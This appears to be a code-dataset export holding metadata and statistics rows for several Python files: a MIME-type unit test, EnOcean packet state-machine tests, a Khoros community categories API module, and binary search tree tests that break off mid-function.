| 0.067929
| 0.123538
| 0.112929
| 0.093423
| 0.938702
| 0.930831
| 0.917442
| 0.886921
| 0.862688
| 0.842135
| 0
| 0.132046
| 0.22431
| 68,615
| 914
| 125
| 75.071116
| 0.746411
| 0
| 0
| 0.642232
| 0
| 0
| 0.657354
| 0.048094
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6d2143471ce78eca00ad6886f27b2dcfc1255aa1
| 713
|
py
|
Python
|
tests/unit/lbrynet_daemon/test_mime_types.py
|
abueide/lbry
|
7f5deaf6c80422a30b3714d4bf12e028756ed9fe
|
[
"MIT"
] | null | null | null |
tests/unit/lbrynet_daemon/test_mime_types.py
|
abueide/lbry
|
7f5deaf6c80422a30b3714d4bf12e028756ed9fe
|
[
"MIT"
] | null | null | null |
tests/unit/lbrynet_daemon/test_mime_types.py
|
abueide/lbry
|
7f5deaf6c80422a30b3714d4bf12e028756ed9fe
|
[
"MIT"
] | null | null | null |
import unittest
from lbrynet.schema import mime_types
class TestMimeTypes(unittest.TestCase):
def test_mp4_video(self):
self.assertEqual("video/mp4", mime_types.guess_media_type("test.mp4"))
self.assertEqual("video/mp4", mime_types.guess_media_type("test.MP4"))
def test_x_ext_(self):
self.assertEqual("application/x-ext-lbry", mime_types.guess_media_type("test.lbry"))
self.assertEqual("application/x-ext-lbry", mime_types.guess_media_type("test.LBRY"))
def test_octet_stream(self):
self.assertEqual("application/octet-stream", mime_types.guess_media_type("test."))
self.assertEqual("application/octet-stream", mime_types.guess_media_type("test"))
| 41.941176
| 92
| 0.737728
| 97
| 713
| 5.154639
| 0.257732
| 0.126
| 0.168
| 0.228
| 0.728
| 0.728
| 0.728
| 0.728
| 0.728
| 0.728
| 0
| 0.008026
| 0.126227
| 713
| 16
| 93
| 44.5625
| 0.794543
| 0
| 0
| 0
| 0
| 0
| 0.214586
| 0.129032
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| false
| 0
| 0.166667
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6d2f53fba792a29d8536f7b5bab7f4df778d8d27
| 6,196
|
py
|
Python
|
test/test_enocean_packet_hsm.py
|
MainRo/python-flock
|
e1faa78d6aba374493336651848daadad82387a8
|
[
"MIT"
] | null | null | null |
test/test_enocean_packet_hsm.py
|
MainRo/python-flock
|
e1faa78d6aba374493336651848daadad82387a8
|
[
"MIT"
] | null | null | null |
test/test_enocean_packet_hsm.py
|
MainRo/python-flock
|
e1faa78d6aba374493336651848daadad82387a8
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from flock.controller.enocean.protocol import EnoceanPacketHsm
class EnoceanPacketHsmTestCase(TestCase):
def test_init(self):
hsm = EnoceanPacketHsm()
self.assertEqual(hsm.state_sync, hsm.current_state)
self.assertIsNone(hsm.get_packet())
def test_sync(self):
hsm = EnoceanPacketHsm()
hsm.on_data('\x55')
self.assertEqual(hsm.state_header, hsm.current_state)
self.assertIsNone(hsm.get_packet())
def test_sync_lock(self):
hsm = EnoceanPacketHsm()
# invalid sync packets must be dropped
hsm.on_data('\x50')
self.assertEqual(hsm.state_sync, hsm.current_state)
hsm.on_data('\x51')
self.assertEqual(hsm.state_sync, hsm.current_state)
hsm.on_data('\x52')
self.assertEqual(hsm.state_sync, hsm.current_state)
# and sync packet must match
hsm.on_data('\x55')
self.assertEqual(hsm.state_header, hsm.current_state)
self.assertIsNone(hsm.get_packet())
def test_header(self):
# go to header state
hsm = EnoceanPacketHsm()
hsm.on_data('\x55')
self.assertEqual(hsm.state_header, hsm.current_state)
hsm.on_data('\x02')
hsm.on_data('\x05')
hsm.on_data('\x07')
hsm.on_data('\x08')
self.assertEqual(hsm.state_crc_header, hsm.current_state)
def test_crc_header(self):
# go to header state
hsm = EnoceanPacketHsm()
hsm.on_data('\x55')
hsm.on_data('\x02')
hsm.on_data('\x05')
hsm.on_data('\x07')
hsm.on_data('\x08')
self.assertEqual(hsm.state_crc_header, hsm.current_state)
hsm.on_data('\x42')
self.assertEqual(hsm.state_data, hsm.current_state)
def test_crc_header_no_optional(self):
""" packet with no optional data
"""
# go to header state
hsm = EnoceanPacketHsm()
hsm.on_data('\x55')
hsm.on_data('\x00') # size MSB
hsm.on_data('\x02') # size LSB
hsm.on_data('\x00') # optional size
hsm.on_data('\x08')
self.assertEqual(hsm.state_crc_header, hsm.current_state)
hsm.on_data('\x42')
self.assertEqual(hsm.state_data, hsm.current_state)
def test_crc_header_no_data(self):
""" packet with no data but optional data
"""
# go to header state
hsm = EnoceanPacketHsm()
hsm.on_data('\x55')
hsm.on_data('\x00') # size MSB
hsm.on_data('\x00') # size LSB
hsm.on_data('\x07')
hsm.on_data('\x08')
self.assertEqual(hsm.state_crc_header, hsm.current_state)
hsm.on_data('\x42')
self.assertEqual(hsm.state_optional_data, hsm.current_state)
def test_crc_header_no_data_no_optional(self):
""" packet with no data and no optional data
"""
# go to header state
hsm = EnoceanPacketHsm()
hsm.on_data('\x55')
hsm.on_data('\x00') # size MSB
hsm.on_data('\x00') # size LSB
hsm.on_data('\x00') # optional size
hsm.on_data('\x08')
self.assertEqual(hsm.state_crc_header, hsm.current_state)
hsm.on_data('\x42')
self.assertEqual(hsm.state_crc_data, hsm.current_state)
def test_data(self):
# go to header state
hsm = EnoceanPacketHsm()
hsm.on_data('\x55')
hsm.on_data('\x00') # size MSB
hsm.on_data('\x02') # size LSB
hsm.on_data('\x07')
hsm.on_data('\x08')
hsm.on_data('\x42')
self.assertEqual(hsm.state_data, hsm.current_state)
hsm.on_data('\x01')
hsm.on_data('\x02')
self.assertEqual(hsm.state_optional_data, hsm.current_state)
def test_optional_data(self):
# initialize
hsm = EnoceanPacketHsm()
hsm.on_data('\x55')
hsm.on_data('\x00') # size MSB
hsm.on_data('\x02') # size LSB
hsm.on_data('\x01') # optional size
hsm.on_data('\x08')
hsm.on_data('\x42')
hsm.on_data('\x01')
hsm.on_data('\x02')
self.assertEqual(hsm.state_optional_data, hsm.current_state)
hsm.on_data('\x03')
self.assertEqual(hsm.state_crc_data, hsm.current_state)
def test_crc_data(self):
# initialize
hsm = EnoceanPacketHsm()
hsm.on_data('\x55')
hsm.on_data('\x00') # size MSB
hsm.on_data('\x02') # size LSB
hsm.on_data('\x01') # optional size
hsm.on_data('\x08')
hsm.on_data('\x42')
hsm.on_data('\x01')
hsm.on_data('\x02')
hsm.on_data('\x03')
self.assertEqual(hsm.state_crc_data, hsm.current_state)
hsm.on_data('\x42')
self.assertEqual(hsm.state_sync, hsm.current_state)
def test_data_packet(self):
# initialize
data = '\x55\x00\x02\x01\x08\x42\x01\x02\x03\x42'
hsm = EnoceanPacketHsm()
for byte in data:
hsm.on_data(byte)
self.assertEqual(hsm.state_sync, hsm.current_state)
packet = hsm.get_packet()
self.assertEqual(ord(data[4]), packet['type'])
self.assertEqual(data[6:8], packet['data'])
self.assertEqual(data[8:9], packet['optional_data'])
def test_packet_no_optional(self):
# initialize
data = '\x55\x00\x02\x00\x08\x42\x01\x02\x42'
hsm = EnoceanPacketHsm()
for byte in data:
hsm.on_data(byte)
self.assertEqual(hsm.state_sync, hsm.current_state)
packet = hsm.get_packet()
self.assertEqual(ord(data[4]), packet['type'])
self.assertEqual(data[6:8], packet['data'])
self.assertEqual('', packet['optional_data'])
def test_packet_empty(self):
""" Packet with no data and no optional data
"""
data = '\x55\x00\x00\x00\x08\x42\x42'
hsm = EnoceanPacketHsm()
for byte in data:
hsm.on_data(byte)
self.assertEqual(hsm.state_sync, hsm.current_state)
packet = hsm.get_packet()
self.assertEqual(ord(data[4]), packet['type'])
self.assertEqual('', packet['data'])
self.assertEqual('', packet['optional_data'])
| 32.783069
| 68
| 0.602808
| 808
| 6,196
| 4.415842
| 0.082921
| 0.089686
| 0.161435
| 0.161155
| 0.902466
| 0.896861
| 0.856222
| 0.835482
| 0.810818
| 0.794002
| 0
| 0.040053
| 0.262589
| 6,196
| 188
| 69
| 32.957447
| 0.740862
| 0.092156
| 0
| 0.822695
| 0
| 0
| 0.073762
| 0.018665
| 0
| 0
| 0
| 0
| 0.262411
| 1
| 0.099291
| false
| 0
| 0.014184
| 0
| 0.120567
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b61aacdd91a4c92b9cec32fcfefd6ebc0a425786
| 24,983
|
py
|
Python
|
khoros/structures/categories.py
|
stevenspasbo/khoros
|
7a50be1546fd90825343957f9c579ed804c2d480
|
[
"MIT"
] | 7
|
2020-02-21T16:31:08.000Z
|
2021-12-13T13:28:55.000Z
|
khoros/structures/categories.py
|
stevenspasbo/khoros
|
7a50be1546fd90825343957f9c579ed804c2d480
|
[
"MIT"
] | 53
|
2020-06-25T23:59:38.000Z
|
2022-03-14T20:38:03.000Z
|
khoros/structures/categories.py
|
stevenspasbo/khoros
|
7a50be1546fd90825343957f9c579ed804c2d480
|
[
"MIT"
] | 3
|
2020-10-20T15:53:21.000Z
|
2021-06-23T18:13:11.000Z
|
# -*- coding: utf-8 -*-
"""
:Module: khoros.structures.categories
:Synopsis: This module contains functions specific to categories within the Khoros Community platform
:Usage: ``from khoros.structures import categories``
:Example: ``category_id = categories.get_category_id(url)``
:Created By: Jeff Shurtliff
:Last Modified: Jeff Shurtliff
:Modified Date: 17 Jul 2020
"""
import warnings
from . import base
from ..utils import log_utils
from .. import api, liql, errors
# Initialize the logger for this module
logger = log_utils.initialize_logging(__name__)
def create(khoros_object, category_id, category_title, parent_id=None, return_json=True):
"""This function creates a new category.
.. versionadded:: 2.5.0
:param khoros_object: The core :py:class:`khoros.Khoros` object
:type khoros_object: class[khoros.Khoros]
:param category_id: The Category ID of the new category (e.g. ``video-games``)
:type category_id: str
:param category_title: The title of the new category (e.g. ``Video Games``)
:type category_title: str
:param parent_id: The Category ID of the parent category (optional)
:type parent_id: str, None
:param return_json: Determines whether or not the response should be returned in JSON format (``True`` by default)
:type return_json: bool
:returns: The response from the API call
:raises: :py:exc:`ValueError`, :py:exc:`khoros.errors.exceptions.POSTRequestError`,
:py:exc:`khoros.errors.exceptions.APIConnectionError`
"""
parent_url = f"categories/id/{parent_id}/" if parent_id else ""
endpoint = f"{parent_url}categories/add"
query_params = {
'category.id': category_id,
'category.title': category_title
}
return api.make_v1_request(khoros_object, endpoint, query_params, 'POST', return_json)
def get_category_id(url):
"""This function retrieves the Category ID for a given category when provided its URL.
.. versionchanged:: 2.6.0
The function was refactored to leverage the :py:func:`khoros.structures.base.get_structure_id` function.
:param url: The URL from which to parse out the Category ID
:type url: str
:returns: The Category ID retrieved from the URL
:raises: :py:exc:`khoros.errors.exceptions.InvalidURLError`
"""
return base.get_structure_id(url)
def get_total_count(khoros_object):
"""This function returns the total number of categories within the Khoros Community environment.
.. versionadded:: 2.6.0
:param khoros_object: The core :py:class:`khoros.Khoros` object
:type khoros_object: class[khoros.Khoros]
:returns: The total number of categories as an integer
:raises: :py:exc:`khoros.errors.exceptions.GETRequestError`
"""
return liql.get_total_count(khoros_object, 'categories')
def get_total_category_count(khoros_object):
"""This function returns the total number of categories within the Khoros Community environment.
.. deprecated:: 2.6.0
Use the :py:func:`khoros.structures.categories.get_total_count` function instead.
:param khoros_object: The core :py:class:`khoros.Khoros` object
:type khoros_object: class[khoros.Khoros]
:returns: The total number of categories as an integer
:raises: :py:exc:`khoros.errors.exceptions.GETRequestError`
"""
warnings.warn("The 'khoros.structures.categories.get_total_category_count' function has been deprecated by the"
"'khoros.structures.categories.get_total_count' function and will be removed in a future release.",
DeprecationWarning)
return get_total_count(khoros_object)
def category_exists(khoros_object, category_id=None, category_url=None):
"""This function checks to see if a category exists.
.. versionadded:: 2.7.0
:param khoros_object: The core :py:class:`khoros.Khoros` object
:type khoros_object: class[khoros.Khoros]
:param category_id: The ID of the category to check
:type category_id: str, None
:param category_url: The URL of the category to check
:type category_url: str, None
:returns: Boolean value indicating whether or not the category already exists
:raises: :py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
"""
return base.structure_exists(khoros_object, 'category', category_id, category_url)
def get_category_details(khoros_object, identifier, first_item=True):
"""This function returns a dictionary of category configuration settings.
.. versionadded:: 2.1.0
:param khoros_object: The core :py:class:`khoros.Khoros` object
:type khoros_object: class[khoros.Khoros]
:param identifier: The Category ID or Category URL with which to identify the category
:type identifier: str
:param first_item: Filters the response data to the first item returned (``True`` by default)
:type first_item: bool
:returns: The category details within a dictionary
:raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
:py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
:py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
"""
return base.get_details(khoros_object, identifier, 'category', first_item)
def get_category_field(khoros_object, field, identifier=None, category_details=None):
"""This function returns a specific category field from the Khoros Community API.
.. versionadded:: 2.1.0
:param khoros_object: The core :py:class:`khoros.Khoros` object
:type khoros_object: class[khoros.Khoros]
:param field: The field from the :py:class:`khoros.structures.base.Mapping` class whose value should be returned
:type field: str
:param identifier: The Category ID or Category URL with which to identify the category
:type identifier: str, None
:param category_details: The data captured from the :py:func:`khoros.structures.base.get_details` function
:type category_details: dict, None
:returns: The requested field in its native format
:raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
:py:exc:`khoros.errors.exceptions.InvalidFieldError`,
:py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
:py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
"""
return base.get_structure_field(khoros_object, field, identifier, structure_type='category',
details=category_details)
def get_url(khoros_object, category_id=None, category_details=None):
"""This function retrieves the URL of a given category.
.. versionadded:: 2.1.0
:param khoros_object: The core :py:class:`khoros.Khoros` object
:type khoros_object: class[khoros.Khoros]
:param category_id: The ID of the category to be evaluated (optional if ``category_details`` dictionary is provided)
:type category_id: str, None
:param category_details: The data captured from the :py:func:`khoros.structures.base.get_details` function
:type category_details: dict, None
:returns: The full URL of the category
:raises: :py:exc:`khoros.errors.exceptions.InvalidFieldError`,
:py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
:py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
"""
category_url = get_category_field(khoros_object, 'view_href', category_id, category_details)
if '://' not in category_url:
base_url = khoros_object.core['community_url']
category_url = f"{base_url}{get_category_field(khoros_object, 'view_href', category_id, category_details)}"
return category_url
def get_title(khoros_object, identifier=None, full_title=True, short_title=False, category_details=None):
"""This function retrieves the full and/or short title of the category.
.. versionadded:: 2.1.0
:param khoros_object: The core :py:class:`khoros.Khoros` object
:type khoros_object: class[khoros.Khoros]
:param identifier: The Category ID or Category URL with which to identify the category
:type identifier: str, None
:param full_title: Return the full title of the category (``True`` by default)
:type full_title: bool
:param short_title: Return the short title of the category (``False`` by default)
:type short_title: bool
:param category_details: Dictionary containing category details (optional)
:type category_details: dict, None
:returns: The category title(s) as a string or a tuple of strings
:raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
:py:exc:`khoros.errors.exceptions.InvalidFieldError`,
:py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
:py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
"""
if not full_title and not short_title:
exc_msg = "Must return at least the full title or the short title."
raise errors.exceptions.MissingRequiredDataError(exc_msg)
if not category_details:
category_details = get_category_details(khoros_object, identifier)
titles = (category_details['title'], category_details['short_title'])
if not short_title:
titles = titles[0]
elif not full_title:
titles = titles[1]
return titles
def get_description(khoros_object, identifier=None, category_details=None):
"""This function retrieves the description for a given category.
.. versionadded:: 2.1.0
:param khoros_object: The core :py:class:`khoros.Khoros` object
:type khoros_object: class[khoros.Khoros]
:param identifier: The Category ID or Category URL with which to identify the category
:type identifier: str, None
:param category_details: Dictionary containing community details (optional)
:type category_details: dict, None
:returns: The description in string format
:raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
:py:exc:`khoros.errors.exceptions.InvalidFieldError`,
:py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
:py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
"""
return get_category_field(khoros_object, 'description', identifier, category_details)
def get_parent_type(khoros_object, identifier=None, category_details=None):
"""This function retrieves the parent type for a given category.
.. versionadded:: 2.1.0
:param khoros_object: The core :py:class:`khoros.Khoros` object
:type khoros_object: class[khoros.Khoros]
:param identifier: The Category ID or Category URL with which to identify the category
:type identifier: str, None
:param category_details: Dictionary containing community details (optional)
:type category_details: dict, None
:returns: The parent type in string format
:raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
:py:exc:`khoros.errors.exceptions.InvalidFieldError`,
:py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
:py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
"""
return get_category_field(khoros_object, 'parent_type', identifier, category_details)
def get_parent_id(khoros_object, identifier=None, category_details=None):
"""This function retrieves the parent ID for a given category.
.. versionadded:: 2.1.0
:param khoros_object: The core :py:class:`khoros.Khoros` object
:type khoros_object: class[khoros.Khoros]
:param identifier: The Category ID or Category URL with which to identify the category
:type identifier: str, None
:param category_details: Dictionary containing community details (optional)
:type category_details: dict, None
:returns: The parent ID in string format
:raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
:py:exc:`khoros.errors.exceptions.InvalidFieldError`,
:py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
:py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
"""
return get_category_field(khoros_object, 'parent_id', identifier, category_details)
def get_parent_url(khoros_object, identifier=None, category_details=None):
"""This function retrieves the parent URL for a given category.
.. versionadded:: 2.1.0
:param khoros_object: The core :py:class:`khoros.Khoros` object
:type khoros_object: class[khoros.Khoros]
:param identifier: The Category ID or Category URL with which to identify the category
:type identifier: str, None
:param category_details: Dictionary containing community details (optional)
:type category_details: dict, None
:returns: The parent URL in string format
:raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
:py:exc:`khoros.errors.exceptions.InvalidFieldError`,
:py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
:py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
"""
return get_category_field(khoros_object, 'parent_view_href', identifier, category_details)
def get_root_type(khoros_object, identifier=None, category_details=None):
"""This function retrieves the root category type for a given category.
.. versionadded:: 2.1.0
:param khoros_object: The core :py:class:`khoros.Khoros` object
:type khoros_object: class[khoros.Khoros]
:param identifier: The Category ID or Category URL with which to identify the category
:type identifier: str, None
:param category_details: Dictionary containing community details (optional)
:type category_details: dict, None
:returns: The root category type in string format
:raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
:py:exc:`khoros.errors.exceptions.InvalidFieldError`,
:py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
:py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
"""
return get_category_field(khoros_object, 'root_type', identifier, category_details)
def get_root_id(khoros_object, identifier=None, category_details=None):
"""This function retrieves the root category ID for a given category.
.. versionadded:: 2.1.0
:param khoros_object: The core :py:class:`khoros.Khoros` object
:type khoros_object: class[khoros.Khoros]
:param identifier: The Category ID or Category URL with which to identify the category
:type identifier: str, None
:param category_details: Dictionary containing community details (optional)
:type category_details: dict, None
:returns: The root category ID in string format
:raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
:py:exc:`khoros.errors.exceptions.InvalidFieldError`,
:py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
:py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
"""
return get_category_field(khoros_object, 'root_id', identifier, category_details)
def get_root_url(khoros_object, identifier=None, category_details=None):
"""This function retrieves the root category URL for a given category.
.. versionadded:: 2.1.0
:param khoros_object: The core :py:class:`khoros.Khoros` object
:type khoros_object: class[khoros.Khoros]
:param identifier: The Category ID or Category URL with which to identify the category
:type identifier: str, None
:param category_details: Dictionary containing community details (optional)
:type category_details: dict, None
:returns: The root category URL in string format
:raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
:py:exc:`khoros.errors.exceptions.InvalidFieldError`,
:py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
:py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
"""
return get_category_field(khoros_object, 'root_view_href', identifier, category_details)
def get_language(khoros_object, identifier=None, category_details=None):
"""This function retrieves the defined language for a given category.
.. versionadded:: 2.1.0
:param khoros_object: The core :py:class:`khoros.Khoros` object
:type khoros_object: class[khoros.Khoros]
:param identifier: The Category ID or Category URL with which to identify the category
:type identifier: str, None
:param category_details: Dictionary containing community details (optional)
:type category_details: dict, None
:returns: The language (e.g. ``en``) in string format
:raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
:py:exc:`khoros.errors.exceptions.InvalidFieldError`,
:py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
:py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
"""
return get_category_field(khoros_object, 'language', identifier, category_details)
def is_hidden(khoros_object, identifier=None, category_details=None):
"""This function identifies whether or not a given category is hidden.
.. versionadded:: 2.1.0
:param khoros_object: The core :py:class:`khoros.Khoros` object
:type khoros_object: class[khoros.Khoros]
:param identifier: The Category ID or Category URL with which to identify the category
:type identifier: str, None
:param category_details: Dictionary containing community details (optional)
:type category_details: dict, None
:returns: Boolean value indicating if the category is hidden
:raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
:py:exc:`khoros.errors.exceptions.InvalidFieldError`,
:py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
:py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
"""
return get_category_field(khoros_object, 'hidden', identifier, category_details)
def get_views(khoros_object, identifier=None, category_details=None):
"""This function retrieves the total view count for a given category.
.. versionadded:: 2.1.0
:param khoros_object: The core :py:class:`khoros.Khoros` object
:type khoros_object: class[khoros.Khoros]
:param identifier: The Category ID or Category URL with which to identify the category
:type identifier: str, None
:param category_details: Dictionary containing community details (optional)
:type category_details: dict, None
:returns: The total number of views
:raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
:py:exc:`khoros.errors.exceptions.InvalidFieldError`,
:py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
:py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
"""
return get_category_field(khoros_object, 'views', identifier, category_details)
def friendly_date_enabled(khoros_object, identifier=None, category_details=None):
"""This function identifies if friendly dates are enabled for a given category.
.. versionadded:: 2.1.0
:param khoros_object: The core :py:class:`khoros.Khoros` object
:type khoros_object: class[khoros.Khoros]
:param identifier: The Category ID or Category URL with which to identify the category
:type identifier: str, None
:param category_details: Dictionary containing community details (optional)
:type category_details: dict, None
:returns: Boolean indicating if friendly dates are enabled
:raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
:py:exc:`khoros.errors.exceptions.InvalidFieldError`,
:py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
:py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
"""
return get_category_field(khoros_object, 'friendly_date_enabled', identifier, category_details)
def get_friendly_date_max_age(khoros_object, identifier=None, category_details=None):
"""This function retrieves the maximum age where friendly dates should be used (if enabled) for a given category.
.. versionadded:: 2.1.0
:param khoros_object: The core :py:class:`khoros.Khoros` object
:type khoros_object: class[khoros.Khoros]
:param identifier: The Category ID or Category URL with which to identify the category
:type identifier: str, None
:param category_details: Dictionary containing community details (optional)
:type category_details: dict, None
:returns: Integer representing the number of days the friendly date feature should be leveraged if enabled
:raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
:py:exc:`khoros.errors.exceptions.InvalidFieldError`,
:py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
:py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
"""
return get_category_field(khoros_object, 'friendly_date_max_age', identifier, category_details)
def get_active_skin(khoros_object, identifier=None, category_details=None):
"""This function retrieves the skin being used with a given category.
.. versionadded:: 2.1.0
:param khoros_object: The core :py:class:`khoros.Khoros` object
:type khoros_object: class[khoros.Khoros]
:param identifier: The Category ID or Category URL with which to identify the category
:type identifier: str, None
:param category_details: Dictionary containing community details (optional)
:type category_details: dict, None
:returns: The name of the active skin in string format
:raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
:py:exc:`khoros.errors.exceptions.InvalidFieldError`,
:py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
:py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
"""
return get_category_field(khoros_object, 'skin', identifier, category_details)
def get_depth(khoros_object, identifier=None, category_details=None):
"""This function retrieves the depth of a given category.
.. versionadded:: 2.1.0
:param khoros_object: The core :py:class:`khoros.Khoros` object
:type khoros_object: class[khoros.Khoros]
:param identifier: The Category ID or Category URL with which to identify the category
:type identifier: str, None
:param category_details: Dictionary containing community details (optional)
:type category_details: dict, None
:returns: The depth of the category as an integer
:raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
:py:exc:`khoros.errors.exceptions.InvalidFieldError`,
:py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
:py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
"""
return get_category_field(khoros_object, 'depth', identifier, category_details)
def get_position(khoros_object, identifier=None, category_details=None):
"""This function retrieves the position of a given category.
.. versionadded:: 2.1.0
:param khoros_object: The core :py:class:`khoros.Khoros` object
:type khoros_object: class[khoros.Khoros]
:param identifier: The Category ID or Category URL with which to identify the category
:type identifier: str, None
:param category_details: Dictionary containing community details (optional)
:type category_details: dict, None
:returns: The position of the category as an integer
:raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
:py:exc:`khoros.errors.exceptions.InvalidFieldError`,
:py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
:py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
"""
return get_category_field(khoros_object, 'position', identifier, category_details)
def get_creation_date(khoros_object, identifier=None, category_details=None):
"""This function retrieves the creation date of a given category.
.. versionadded:: 2.1.0
:param khoros_object: The core :py:class:`khoros.Khoros` object
:type khoros_object: class[khoros.Khoros]
:param identifier: The Category ID or Category URL with which to identify the category
:type identifier: str, None
:param category_details: Dictionary containing community details (optional)
:type category_details: dict, None
:returns: The creation of the category in string format
:raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
:py:exc:`khoros.errors.exceptions.InvalidFieldError`,
:py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
:py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
"""
# TODO: Allow a format to be specified and the ability to parse as a datetime object if needed
return get_category_field(khoros_object, 'get_creation_date', identifier, category_details)
| 47.137736
| 120
| 0.729896
| 3,114
| 24,983
| 5.737636
| 0.072897
| 0.081939
| 0.051715
| 0.079924
| 0.803437
| 0.770918
| 0.74243
| 0.72133
| 0.715285
| 0.712375
| 0
| 0.004128
| 0.17588
| 24,983
| 529
| 121
| 47.226843
| 0.863665
| 0.727014
| 0
| 0
| 0
| 0
| 0.122257
| 0.044072
| 0
| 0
| 0
| 0.00189
| 0
| 1
| 0.316456
| false
| 0
| 0.050633
| 0
| 0.683544
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
b67195136aad1df3ab974de75261ed6ef49d4cd0
| 7,026
|
py
|
Python
|
binary_search_tree/test_binary_search_tree.py
|
akniyev/clrs_solutions
|
691acb8b0dfcc4375b89ae597dfdd6ae342ce7fa
|
[
"MIT"
] | null | null | null |
binary_search_tree/test_binary_search_tree.py
|
akniyev/clrs_solutions
|
691acb8b0dfcc4375b89ae597dfdd6ae342ce7fa
|
[
"MIT"
] | null | null | null |
binary_search_tree/test_binary_search_tree.py
|
akniyev/clrs_solutions
|
691acb8b0dfcc4375b89ae597dfdd6ae342ce7fa
|
[
"MIT"
] | null | null | null |
import unittest
import numpy as np
from .binary_search_tree import *
class TestBinarySearchTree(unittest.TestCase):
def test_minimum(self):
for i in range(1, 100):
elements = np.random.random(i) * 100 - 50
min_element = min(elements)
tree = BinarySearchTree()
for element in elements:
tree.insert(element)
self.assertEqual(tree.minimum(), min_element)
def test_maximum(self):
for i in range(1, 100):
elements = np.random.random(i) * 100 - 50
max_element = max(elements)
tree = BinarySearchTree()
for element in elements:
tree.insert(element)
self.assertEqual(tree.maximum(), max_element)
def test_tree_structure_basic(self):
for i in range(1, 100):
elements = np.random.random(i) * 100 - 50
tree = BinarySearchTree()
for element in elements:
tree.insert(element)
self.assertEqual(tree.to_sorted_array(), sorted(elements))
def test_tree_height(self):
elements_and_heights = [
([1, 2, 3, 4, 5, 6], 6),
([6, 5, 4, 3, 2, 1], 6),
([2, 1, 3], 2),
([20, 10, 30, 15, 5], 3),
([20, 10, 30, 15, 16], 4),
]
for (elements, height) in elements_and_heights:
tree = BinarySearchTree()
